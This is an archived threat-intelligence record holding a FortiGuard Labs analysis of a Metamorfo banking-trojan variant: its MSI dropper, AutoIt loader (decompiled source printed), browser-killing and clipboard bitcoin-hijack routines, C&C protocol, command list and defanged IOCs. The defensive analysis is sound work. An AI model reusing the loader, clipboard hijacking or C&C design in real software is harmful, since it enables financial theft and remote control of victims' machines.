{
	"id": "4dfdc76f-e1e6-41bf-b134-409374db291a",
	"created_at": "2026-04-06T00:07:51.326787Z",
	"updated_at": "2026-04-10T13:11:44.001335Z",
	"deleted_at": null,
	"sha1_hash": "c4729076cd5b543eb3e49cef5549cb247ebffba8",
	"title": "Another Metamorfo Variant Targeting Customers of Financial Institutions in More Countries",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1001017,
	"plain_text": "Another Metamorfo Variant Targeting Customers of Financial\r\nInstitutions in More Countries\r\nBy Xiaopeng Zhang\r\nPublished: 2020-02-04 · Archived: 2026-04-02 12:01:16 UTC\r\nFortiGuard Labs Threat Analysis\r\nAffected platforms: Windows\r\nImpacted parties: Online Financial Institutions\r\nImpact: Theft of financial information\r\nSeverity level: High\r\nMetamorfo is a malware family that was observed targeting the customers of online financial institutions.\r\nRecently, FortiGuard Labs captured two different Metamorfo variants. We have already published an analysis\r\nblog for the first, which only targets the customers of Brazilian financial institutions.\r\nThis second Metamorfo variant targets the customers of even more financial institutions across multiple countries.\r\nIn this post you can see how it infects the machines of its victims and what it is able to do on a victim’s machine,\r\nincluding how it collects data and communicates with its command and control (C\u0026C) server, as well as what\r\nC\u0026C commands it supports.\r\nStarting from the Captured Sample\r\nThe captured sample used in this analysis is an MSI file named “view-(AVISO)2020.msi” that is spread through a\r\nZIP archive, just as with the previous variant. In the previous analysis, I showed that this MSI file is parsed and\r\nexecuted automatically by MsiExec.exe when a user double-clicks on it in Windows OS.\r\nAnalyzing this latest MSI file, I discovered that it also has a stream with the same name – “!_StringData” – where I\r\nfound a piece of JavaScript code that had been mixed in with a huge amount of garbage strings. After I extracted\r\nand de-obfuscated the JavaScript code, it was easy to see what the code does. 
Figure 1 is a code snippet that shows\r\nthe key functions of that JavaScript code being used.\r\nhttps://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions\r\nPage 1 of 15\n\nFigure 1. JavaScript code snippet extracted from the stream “!_StringData”\r\nIt downloads a file from the URL \"hxxp[:]//www[.]chmsc[.]edu[.]ph/library/modules/down/op57.lts\", which is\r\nactually a ZIP file containing three files. It then gets decompressed into a newly created random-string folder (in\r\nthis case, “RrRbiebL”) under “C:\\”. Also, the three decompressed files are renamed with random strings, which in\r\nthis analysis were “cMejBlQe.exe”, “M6WnYxAh” and “YvSVUyps.dll”. Figure 2 shows the folder information.\r\nFigure 2. Three decompressed files in a random name folder\r\nThese three files are executed in the command line: \"C:\\RrRbiebL\\cMejBlQe.exe C:\\RrRbiebL\\M6WnYxAh\r\nC:\\RrRbiebL\\YvSVUyps.dll\". You may have noticed in Figure 1 that it also added itself into the auto-run group in\r\nthe victim’s system registry. This ensures that it runs automatically whenever the infected system starts. Figure 3 is\r\na screenshot of the auto-run item in the system registry, whose value is just the above command line.\r\nFigure 3. Added into auto-run group in the system registry\r\nAutoIt Script Runs Metamorfo\r\n“C:\\RrRbiebL\\cMejBlQe.exe” is run with the parameters “C:\\RrRbiebL\\M6WnYxAh\r\nC:\\RrRbiebL\\YvSVUyps.dll”. Through my analysis I learned that the file “cMejBlQe.exe” is an AutoIt script\r\nexecution program, whose original name was “AutoIt3.exe”. The file “M6WnYxAh” is a compiled binary AutoIt\r\nscript file (i.e. 
“.A3X” file), and “YvSVUyps.dll” includes the major body of this Metamorfo variant.\r\nAutoIt has been observed being abused by a number of malware families for malicious purposes in the past. The\r\nreason for using AutoIt could be to bypass antivirus detection.\r\nDecompiling the file “M6WnYxAh” reveals its source code:\r\nSLEEP(2000)\r\n_SLEEP(2000)\r\nSLEEP(2000)\r\n_SLEEP(2000)\r\nGLOBAL $NPYVKYZFH1Z9T8E5CL48UGNZ878HTHO91S63AH=$CMDLINE[1]\r\nGLOBAL $KPH98S477U6K32TXPN3F8UBVSHZ=DLLOPEN($NPYVKYZFH1Z9T8E5CL48UGNZ878HTHO91S63AH)\r\nDLLCALL($KPH98S477U6K32TXPN3F8UBVSHZ,\"Int\",\"B1OWOEFK3SBYS0ETX4XXHRNV7SZGYFTU\")\r\nFUNC _SLEEP($IDELAY)\r\n    DLLCALL(\"Kernel32.dll\",\"none\",\"Sleep\",\"dword\",$IDELAY)\r\nENDFUNC\r\nIt pauses 8 seconds at first. Then it loads a DLL file from the path $CMDLINE[1], which is the last parameter in\r\nthe command line; i.e. “C:\\RrRbiebL\\YvSVUyps.dll”. It continues to call an export function of the DLL file\r\nnamed “B1OWOEFK3SBYS0ETX4XXHRNV7SZGYFTU”. After that, the infected victim machine is controlled by\r\nthe DLL code.\r\nAnalysis of the Main Part of Metamorfo\r\nLet’s now take a look at the file “YvSVUyps.dll”. From Figure 4, we can see that the DLL file is protected by the\r\npacker “VMProtect v3.00-3.3.1”. VMProtect is a very strong packer that supports dynamic code protection when\r\nthe target process is running. This creates a big challenge for analysts. For example, all API addresses are hidden\r\nand are dynamically calculated before calling.\r\nFigure 4. Analyzing YvSVUyps.dll with an analysis tool\r\nOnce it ran, I dumped the restored real code from memory. 
By analyzing its ASM code, I also learned that it was\r\ncompiled by Borland Delphi, just like the previous variant I analyzed.\r\nNow it’s time to see what major tasks it will perform on a victim’s system.\r\nAfter the code is restored by VMProtect, the FormCreate() function is called – which can be considered to be the\r\nMain() function.\r\nIt terminates running browsers, such as Microsoft IE, Mozilla Firefox, Google Chrome, Microsoft Edge and\r\nOpera, by killing the following processes: \"iexplore.exe\", \"firefox.exe\", \"chrome.exe\", \"microsoftedge.exe\", and\r\n\"opera.exe\". The process name strings and most other constant strings in the variant are encrypted using the same\r\nmethod as in the previous variant, but with different decryption keys.\r\n[...]\r\n022AE2BA     lea     edx, [ebp+var_30]\r\n022AE2BD     mov     eax, offset a015f924af437_0\r\n022AE2C2     call    decrypt_fun\r\n022AE2C7     mov     edx, [ebp+var_30]\r\n022AE2CA     lea     eax, [ebp+var_2C]\r\n022AE2CD     call    str_copy_Ascii_Unicode\r\n022AE2D2     mov     edx, [ebp+var_2C]     ; de=\u003e \"iexplore.exe\"\r\n022AE2D5     mov     eax, [ebp+var_4]\r\n022AE2D8     call    _TerminateProcess\r\n022AE2DD     lea     edx, [ebp+var_38]\r\n022AE2E0     mov     eax, offset a5af5093ad16e_0\r\n022AE2E5     call    decrypt_fun\r\n022AE2EA     mov     edx, [ebp+var_38]\r\n022AE2ED     lea     eax, [ebp+var_34]\r\n022AE2F0     call    str_copy_Ascii_Unicode\r\n022AE2F5     mov     edx, [ebp+var_34]     ; de=\u003e \"firefox.exe\"\r\n022AE2F8     mov     eax, [ebp+var_4]\r\n022AE2FB     call    _TerminateProcess\r\n022AE300     lea     edx, [ebp+var_40]\r\n022AE303     mov     eax, offset aA233cd013efd_0\r\n022AE308     call    decrypt_fun\r\n022AE30D     mov     edx, [ebp+var_40]\r\n022AE310     lea     eax, 
[ebp+var_3C]\r\n022AE313     call    str_copy_Ascii_Unicode\r\n022AE318     mov     edx, [ebp+var_3C]     ; de=\u003e \"chrome.exe\"\r\n022AE31B     mov     eax, [ebp+var_4]\r\n022AE31E     call    _TerminateProcess\r\n022AE323     lea     edx, [ebp+var_48]\r\n022AE326     mov     eax, offset aC9023de11adf_0\r\n022AE32B     call    decrypt_fun\r\n022AE330     mov     edx, [ebp+var_48]\r\n022AE333     lea     eax, [ebp+var_44]\r\n022AE336     call    str_copy_Ascii_Unicode\r\n022AE33B     mov     edx, [ebp+var_44]     ; de=\u003e \"microsoftedge.exe\"\r\n022AE33E     mov     eax, [ebp+var_4]\r\n022AE341     call    _TerminateProcess\r\n022AE346     lea     edx, [ebp+var_50]\r\n022AE349     mov     eax, offset a84c66187b74f_0\r\n022AE34E     call    decrypt_fun\r\n022AE353     mov     edx, [ebp+var_50]\r\n022AE356     lea     eax, [ebp+var_4C]\r\n022AE359     call    str_copy_Ascii_Unicode\r\n022AE35E     mov     edx, [ebp+var_4C]     ; de=\u003e \"opera.exe\"\r\n022AE361     mov     eax, [ebp+var_4]\r\n022AE364     call    _TerminateProcess\r\n[...]\r\nThis piece of ASM code shows that it calls a function to decrypt the process name strings and then calls the\r\nfunction _TerminateProcess() to kill all the matched processes from the process list.\r\nIt then modifies several registry key values to disable the IE browser’s functions such as auto-complete, auto-suggest, etc. The disabled keys are: \"Use FormSuggest\", \"FormSuggest Passwords\", \"FormSuggest PW Ask\"\r\nunder the sub-key “HKCU\\Software\\Microsoft\\Internet Explorer\\Main”, and \"AutoSuggest\" under the sub-key\r\n\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\AutoComplete\".\r\nWhat is the purpose of killing the browsers and disabling their auto-complete and auto-suggest functions? 
This\r\naction forces the victim to hand-enter data without auto-complete, such as whole URLs, along with login name,\r\npassword, and so on in the browser. This allows the malware’s key logger function to record the largest number of\r\nactions from the victim’s input.\r\nIt also collects information such as the OS version, Computer Name, installed AV software, and so on from the\r\nvictim’s system.\r\nIf it is running on an infected machine for the first time (depending on whether a flag file exists), it sends a POST\r\npacket to its command-and-control (C\u0026C) server informing it that a machine has been infected. Figure 5 shows\r\nthe details of that packet.\r\nFigure 5. Screenshot of a POST packet to the C\u0026C server\r\nThe URL “hxxp[:]//escapuliu[.]com/happynewyear/EYHS2BZM31D225Q.php” was previously decrypted, and\r\nthe body of this packet contains the victim’s system information. Some of the values are base64-encoded. After\r\ndecoding, the data looks like this:\r\nvv=OP57--06-01\u0026vw=\u0026mods=\u0026uname=*********V-PC\u0026cname=N-96\u0026os=Windows 7 Ultimate6.17601-32\u0026is=\u0026iss=IE.AssocFile.HTM\u0026iav= microsoft security essentials\r\n“vv=OP57--06-01” is the version information of Metamorfo.\r\n“mods=” records whether IBM Trusteer Rapport is running, which is used to protect users from malware.\r\n“uname=*********V-PC” is the victim’s computer name.\r\n“cname=N-96” is a value read out from the system registry.\r\n“os=Windows 7 Ultimate6.17601-32” contains the infected OS version and platform.\r\n“iss=IE.AssocFile.HTM” indicates the victim’s default browser, which in this case is IE.\r\n“iav= microsoft security essentials” is a list of AV software that the victim has installed.\r\nTimer Functions\r\nAs with the previous variant, this one also uses Timers to perform its tasks. 
At the end of the FormCreate()\r\nfunction it starts two Timers. The first Timer is used to monitor a bitcoin wallet address in the system clipboard,\r\nand the other is used to detect whether or not the victim is accessing a financial institution website. I will elaborate\r\non both of these below.\r\nBitcoin Address Timer Function\r\nThis function keeps receiving data from the system clipboard and then determines if it is a valid bitcoin wallet\r\naddress. If yes, it overwrites the wallet address with the attacker’s.\r\nFigure 6. Calling the API SetClipboardData() to overwrite the bitcoin wallet address\r\nFigure 6 shows the calling of the API SetClipboardData(), whose second parameter is the attacker’s wallet address\r\n(\"163McXwBrc9S7JzbgegzVuw7QTJ9H1dQj7\") used to replace the original one in the system clipboard.\r\nUsually, users copy\u0026paste the wallet address to make a bitcoin transfer. In this variant, Metamorfo detects and\r\noverwrites the target wallet in the clipboard. In this way, it attempts to make the victim unknowingly transfer their\r\nbitcoin to the attacker’s bitcoin wallet address (\"163McXwBrc9S7JzbgegzVuw7QTJ9H1dQj7\").\r\nFinancial Institution Timer Function\r\nIt then calls the API EnumWindows() function to enumerate all windows on the victim’s system. Its\r\nEnumFunc() callback function collects all window titles and then adds a 14H-long random string prefix. One\r\nmixed window title looks like this: “{14H-long random string}+window title”. All the mixed window titles are\r\nadded into a string list box control. 
It can also collect the page title of an online banking website that the victim\r\nmay access in a browser.\r\nIn the timer function, it then reads out the mixed window titles from the string list box control, one by one, to\r\nperform string matching against keywords from the targeted financial institutions. There are 32 such keywords\r\nthat are used to enable matching with more than twenty financial institutions in multiple countries, including the\r\nUS, Canada, Peru, Chile, Spain, Brazil, Ecuador, Mexico, and others. For safety reasons, I will not mention the\r\nspecified keywords or the names of the financial institutions being targeted by this malware in this post.\r\nOnce a window title matches one of the keywords of a targeted financial institution, it connects to the C\u0026C server,\r\nwhose host is different from the one mentioned earlier.\r\nBelow is a code snippet that decrypts the C\u0026C server host string and port number, which are “ssl[.]teamo[.]life”\r\nand “8350”.\r\n[...]\r\n022965F7  lea   eax, [ebp+var_18]\r\n022965FA  mov   edx, ds:dword_235CE2C   ; encrypted host string\r\n02296600  mov   ecx, 0\r\n02296605  call  _WideCharToMultiByte\r\n0229660A  mov   eax, [ebp+var_18]\r\n0229660D  lea   edx, [ebp+var_14]\r\n02296610  call  decrypt_fun   ; de=\u003e \"ssl.teamo.life\"\r\n02296615  mov   edx, [ebp+var_14]\r\n02296618  lea   eax, [ebp+var_10]\r\n0229661B  call  str_Ascii_Unicode\r\n02296620  mov   edx, [ebp+var_10]\r\n02296623  lea   ecx, [ebp+var_C]\r\n02296626  mov   eax, [ebp+var_4]\r\n02296629  call  sub_2296470   ; gethostbyname\r\n0229662E  mov   edx, [ebp+var_C]\r\n02296631  mov   eax, [ebp+var_4]\r\n02296634  mov   eax, [eax+3DCh]\r\n0229663A  call  sub_20BF29C\r\n0229663F  lea   eax, [ebp+var_24]\r\n02296642  mov   edx, ds:dword_235CE30   ; encrypted port number\r\n02296648  mov   ecx, 0\r\n0229664D  call  
_WideCharToMultiByte\r\n02296652  mov   eax, [ebp+var_24]\r\n02296655  lea   edx, [ebp+var_20]\r\n02296658  call  decrypt_fun   ; de=\u003e \"8350\"\r\n0229665D  mov   edx, [ebp+var_20]\r\n[...]\r\nCommand and Control with C\u0026C Server\r\nWhen a connection is established with the C\u0026C Server, it sends the command “\u003c|QFUNHSNXU|\u003e” to the server\r\nand waits for control commands to come back to execute further functions on the victim’s system.\r\nFollowing is an example communication between Metamorfo and its C\u0026C server.\r\n\u003c|QFUNHSNXU|\u003e\r\n\u003c|PT|\u003e\r\n\u003c|tksN|\u003eOP57--06-01-N-96\u003c|\u003e32 - Windows 7 Ultimate6.17601\u003c|\u003e********-PC - microsoft security essentials-L4N4c10n\u003c|\u003e********-PC\u003c\u003c|2//\u0026ikILVm9ZtX!L4N4c10n\r\nMetamorfo sent “\u003c|QFUNHSNXU|\u003e” to the server, and then received the control command “\u003c|PT|\u003e” back from\r\nthe server and executed the code for this command. As you can see, it then sent the response packet “\u003c|tksN|\u003e”,\r\nwhich contains the Metamorfo version, system version, platform information, the victim’s computer name, any\r\ninstalled AV software, the identifier string of the matched financial institution name (“L4N4c10n”), and so on.\r\nNOTE: in a packet, the symbol “\u003c|\u003e” is a field delimiter, while “\u003c\u003c|” is an end symbol.\r\nAs with the previous variant, this Metamorfo client uses the SocketRead() function to receive and process the\r\ncontrol commands from the C\u0026C server for this socket.\r\nThis Metamorfo variant supports 119 control commands in total. 
Here they are:\r\n\"\u003c|YuiqkwSgot|\u003e\", \"\u003c|PT|\u003e\", \"\u003c|VOTM|\u003e\", \"\u003c|Gpsxi|\u003e\", \"\u003c|ZKXAKYWQKEHUGZJ|\u003e\", \"\u003c|lozyw|\u003e\",\r\n\"\u003c|SuaykRJ|\u003e\", \"\u003c|SuaykJI|\u003e\", \"\u003c|ztUjzwtR|\u003e\", \"\u003c|IXjzwtR|\u003e\", \"\u003c|Folder|\u003e\", \"\u003c|Files|\u003e\",\r\n\"\u003c|DownloadFile|\u003e\", \"\u003c|UploadFile|\u003e\", \"dkxqdpdv\", \"fuobhjh\", \"pyfsqtpofn\", \"camarinho\", \"beijada\",\r\n\"cidadao\", \"dlulztody\", \"janainaa\", \"nnnaewhwf23nvcxx\", \"vanuza\", \"vanessa\", \"carmena\", \"petereca\",\r\n\"jpevtpjevtjte\", \"djqduidxorv\", \"dulhkqzprf\", \"vaidamole\", \"vadiadaum\", \"lzyxyzoxzdy\",\r\n\"baraomagao\", \"IbqJxbxma\", \"Lmatqo\", \"puplY\", \"hajluvjlY\", \"wlylajhyhJ\", \"gsxuymrle\",\r\n\"sjemwbgonehjexhjjexhjxh\", \"phjdqdfdv\", \"madona\", \"LkingWajuGhkzwu\", \"vkbAlcvtlY\",\r\n\"JtxyXLWA\", \"urpdzchlrdi\", \"JXyhylipS\", \"ndsoiu43098s\", \"snis4duo3098\", \"ki74yfhsag\", \"KxvoJJ\",\r\n\"Bwilmakx\", \"semvergonha\", \"mh42jkrxc3\", \"BwiAivbi\", \"vBiAiiwbwew\", \"Bwiqbi\", \"kdaf4w84fds\",\r\n\"iru4837fbcz\", \"apqi398wjx\", \"Bwiaqk\", \"mfklsjfk3049jsfd\", \"Bwikmn\", \"vpupqbd\", \"ulrvAkhyI\",\r\n\"posseco\", \"jpwhslAzvsI\", \"ihAhaP\", \"dsefsdfds342342\", \"massonaria\", \"kldiu4324987dyyds\",\r\n\"iejdskdjkfl3426232hdshdhs\", \"maconha\", \"cnirhx87ds\", \"b9f8vnh3f7dhvsja4\", \"ihAwpMhauhW\",\r\n\"nhfjds98743hvfavb\", \"mfki73t1dav\", \"fodiufjdo834yfdgf\", \"f9ksa8iuvdo\", \"miwey82fqq\", \"oropeiru23\",\r\n\"kmcjds09498\", \"ewaewqrtrrmwoa\", \"m94ufasjczbal\", \"ulzcecrvAkhocpgyI\", \"hslfasreweyI\", \"perebao\",\r\n\"japones3fadhh\", \"uhkozphslAzvsI\", \"HruxWkrgHHMqgbkgs\", \"kxsHqddeuMHgHrbgrWgk\",\r\n\"bisurdor\", \"curvaduru\", \"vvjpwulw\", \"bosteiro\", \"lkfjasofu4343849\", \"fkvoiudas98\", 
\"coichzbz\",\r\n\"b98djzc\", \"klfjs943jfs\", \"eaqeutmn5r\", \"cracreuz\", \"guilhermina\", \"ztchrhAhaP\", \"IIzvsI\",\r\n\"HAPzvsI\", \"juventude\", \"HAUHWzvsI\", \"KHYIzvsI\", \"jpwzvsI\", \"mljzvsI\", \"hruxyoiu\",\r\n\"COZUMEL\", \"COZUMARIA\", \"LMAimwc\", \"baci83427daca\", \"daa243bi78acc\".\r\nThe following table lists most of the control commands for the main socket, along with their descriptions. From it\r\nyou are able to discover what actions this Metamorfo variant can perform on a victim’s machine.\r\nCommand Description\r\n\u003c|YuiqkwSgot|\u003e Sets the sub-command used for “\u003c|DownloadFile|\u003e”.\r\n\u003c|PT|\u003e Asks for basic information about the victim’s system and the identifier of the matched financial institution.\r\n\u003c|VOTM|\u003e Sends the packet \"\u003c|LSTU|\u003e\" to the server. Functions like a heartbeat.\r\n\u003c|Gpsxi|\u003e Closes all sockets that have connected to the C\u0026C server.\r\n\u003c|lozyw|\u003e Restarts a specified socket.\r\n\u003c|SuaykJI|\u003e Performs a double-click at a specified position.\r\n\u003c|ztUjzwtR|\u003e Moves the cursor to a specified position.\r\n\u003c|IXjzwtR|\u003e Performs a right-click at a specified position.\r\n\u003c|Folder|\u003e Searches folders using given keywords and sends the result to the C\u0026C server.\r\n\u003c|Files|\u003e Searches files using given keywords and sends the results to the C\u0026C server.\r\n\u003c|DownloadFile|\u003e Downloads a file from the C\u0026C server, depending on the command \u003c|YuiqkwSgot|\u003e.\r\n\u003c|UploadFile|\u003e Uploads a file onto the C\u0026C server.\r\ndkxqdpdv Shows the victim a MessageBox with coaxing information.\r\nvanuza Restarts some sockets.\r\nvanessa Displays a fake message to the victim asking them to enter a confirmation code.\r\ncarmena This command has multiple sub-commands to 
simulate the victim typing characters\r\nthat are taken from the command packet into a text box.\r\njpevtpjevtjte Downloads an MSI file from the C\u0026C server and executes it. It can also update itself.\r\ndjqduidxorv Resets the switch file. Deletes files and related folders.\r\nbaraomagao Makes all running browsers (IE, Chrome and Firefox) maximize their windows.\r\nIbqJxbxma, hajluvjlY Makes the system taskbar visible.\r\nLmatqo Shuts down the infected system.\r\npuplY Reboots the infected system.\r\nwlylajhyhJ Plays the \"SYSTEMSTART\" sound by calling the API PlaySoundW().\r\nLkingWajuGhkzwu Closes sockets and exits Metamorfo.\r\nvkbAlcvtlY Runs a .bat file to delete files.\r\nJtxyXLWA Deletes a .dll file and shuts down the system.\r\nurpdzchlrdi, JXyhylipS, ndsoiu43098s, snis4duo3098, ki74yfhsag These commands are related. They can start threads and then manipulate those\r\nthreads to control the victim's input, including mouse and keyboard.\r\nFor example, it is able to block the victim's mouse actions (click, double-click, select\r\ntext, right-click, and so on) on a browser.\r\nKxvoJJ, Bwilmakx, semvergonha, mh42jkrxc3, BwiAivbi, vBiAiiwbwew, Bwiqbi There are more than 50 commands here, but I only listed 7 of them here as an\r\nexample.\r\nThey can make the system taskbar and mouse cursor invisible, display a control such\r\nas a canvas showing the victim’s information, or ask the victim to enter something like a\r\npassword, etc.\r\nSome commands also run a Timer to keep killing \"Windows Task Manager\".\r\nvpupqbd Restores all the settings that the above commands changed.\r\nIIzvsI Creates a file under the user profile folder.\r\nCOZUMEL Starts a thread to run a key logger on a browser.\r\nCOZUMARIA Stops the key logger and sends the recorded data to the C\u0026C server.\r\nLMAimwc Closes running browsers, shows the victim a message, then restarts the victim's system.\r\nHere is an example of the last control command, \"LMAimwc\". It closes running browsers – including “Microsoft\r\nInternet Explorer”, “Google Chrome”, and “Mozilla Firefox” – displays a message, and then restarts the victim’s\r\nsystem. Figure 7, below, shows a screenshot of the message, which is in Spanish and which I have translated into\r\nEnglish.\r\nFigure 7. 
The message of the control command \"LMAimwc\".\r\nSolution\r\nFortinet customers are protected from this Metamorfo variant by FortiGuard’s Web Filtering, AntiVirus, and IPS\r\nservices as follows:\r\nThe related URLs are rated as \"Malicious Websites\" by the FortiGuard Web Filtering service.\r\nThe MSI file is detected as \"W32/Metamorfo\" and blocked by the FortiGuard AntiVirus service.\r\nThe traffic between Metamorfo and its C\u0026C server is detected by the FortiGuard IPS signature\r\n“Trojan.Metamorfo”.\r\nIOCs:\r\nURLs\r\nhxxp[:]//escapuliu[.]com/happynewyear/EYHS2BZM31D225Q.php\r\nhxxp[:]//www[.]chmsc[.]edu[.]ph/library/modules/down/op57.lts\r\nSample SHA-256\r\n[view-(AVISO)2020.msi]\r\nEB1E5EAEA4ECC04B920BBD955C16B17F3D5AC3C580EA266FF5B9D589B8B49E0C\r\nSource: https://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions"
	],
	"report_names": [
		"another-metamorfo-variant-targeting-customers-of-financial-institutions"
	],
	"threat_actors": [
		{
			"id": "08c8f238-1df5-4e75-b4d8-276ebead502d",
			"created_at": "2023-01-06T13:46:39.344081Z",
			"updated_at": "2026-04-10T02:00:03.294222Z",
			"deleted_at": null,
			"main_name": "Copy-Paste",
			"aliases": [],
			"source_name": "MISPGALAXY:Copy-Paste",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434071,
	"ts_updated_at": 1775826704,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c4729076cd5b543eb3e49cef5549cb247ebffba8.pdf",
		"text": "https://archive.orkl.eu/c4729076cd5b543eb3e49cef5549cb247ebffba8.txt",
		"img": "https://archive.orkl.eu/c4729076cd5b543eb3e49cef5549cb247ebffba8.jpg"
	}
}